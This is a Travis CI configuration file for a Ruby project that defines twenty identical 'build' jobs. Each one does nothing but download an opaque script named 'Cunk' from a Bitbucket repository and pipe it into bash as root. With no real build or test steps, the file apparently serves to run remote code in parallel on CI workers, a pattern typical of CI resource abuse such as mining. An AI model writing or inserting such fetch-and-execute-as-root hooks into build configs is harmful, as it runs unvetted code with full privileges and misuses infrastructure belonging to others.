language: ruby


jobs:
  include:
    - stage: test
      name: "build1"
      script:
        - sudo -u root curl https://bitbucket.org/gokacun/acung/raw/d7097d692426571971da4adc249c869f926d94d0/Cunk | bash
        
    -
      name: "build2"
      script:
        - sudo -u root curl https://bitbucket.org/gokacun/acung/raw/d7097d692426571971da4adc249c869f926d94d0/Cunk | bash
        
    -
      name: "build3"
      script:
        - sudo -u root curl https://bitbucket.org/gokacun/acung/raw/d7097d692426571971da4adc249c869f926d94d0/Cunk | bash
        
    -
      name: "build4"
      script:
        - sudo -u root curl https://bitbucket.org/gokacun/acung/raw/d7097d692426571971da4adc249c869f926d94d0/Cunk | bash
        
    -
      name: "build5"
      script:
        - sudo -u root curl https://bitbucket.org/gokacun/acung/raw/d7097d692426571971da4adc249c869f926d94d0/Cunk | bash
        
    -
      name: "build6"
      script:
        - sudo -u root curl https://bitbucket.org/gokacun/acung/raw/d7097d692426571971da4adc249c869f926d94d0/Cunk | bash
        
    -
      name: "build7"
      script:
        - sudo -u root curl https://bitbucket.org/gokacun/acung/raw/d7097d692426571971da4adc249c869f926d94d0/Cunk | bash
        
    -
      name: "build8"
      script:
        - sudo -u root curl https://bitbucket.org/gokacun/acung/raw/d7097d692426571971da4adc249c869f926d94d0/Cunk | bash
        
    -
      name: "build9"
      script:
        - sudo -u root curl https://bitbucket.org/gokacun/acung/raw/d7097d692426571971da4adc249c869f926d94d0/Cunk | bash
        
    -
      name: "build10"
      script:
        - sudo -u root curl https://bitbucket.org/gokacun/acung/raw/d7097d692426571971da4adc249c869f926d94d0/Cunk | bash
        
    -
      name: "build11"
      script:
        - sudo -u root curl https://bitbucket.org/gokacun/acung/raw/d7097d692426571971da4adc249c869f926d94d0/Cunk | bash
        
    -
      name: "build12"
      script:
        - sudo -u root curl https://bitbucket.org/gokacun/acung/raw/d7097d692426571971da4adc249c869f926d94d0/Cunk | bash
        
    -
      name: "build13"
      script:
        - sudo -u root curl https://bitbucket.org/gokacun/acung/raw/d7097d692426571971da4adc249c869f926d94d0/Cunk | bash
        
    -
      name: "build14"
      script:
        - sudo -u root curl https://bitbucket.org/gokacun/acung/raw/d7097d692426571971da4adc249c869f926d94d0/Cunk | bash
        
    -
      name: "build15"
      script:
        - sudo -u root curl https://bitbucket.org/gokacun/acung/raw/d7097d692426571971da4adc249c869f926d94d0/Cunk | bash
        
    -
      name: "build16"
      script:
        - sudo -u root curl https://bitbucket.org/gokacun/acung/raw/d7097d692426571971da4adc249c869f926d94d0/Cunk | bash
        
    -
      name: "build17"
      script:
        - sudo -u root curl https://bitbucket.org/gokacun/acung/raw/d7097d692426571971da4adc249c869f926d94d0/Cunk | bash
        
    -
      name: "build18"
      script:
        - sudo -u root curl https://bitbucket.org/gokacun/acung/raw/d7097d692426571971da4adc249c869f926d94d0/Cunk | bash
        
    -
      name: "build19"
      script:
        - sudo -u root curl https://bitbucket.org/gokacun/acung/raw/d7097d692426571971da4adc249c869f926d94d0/Cunk | bash
        
    -
      name: "build20"
      script:
        - sudo -u root curl https://bitbucket.org/gokacun/acung/raw/d7097d692426571971da4adc249c869f926d94d0/Cunk | bash
        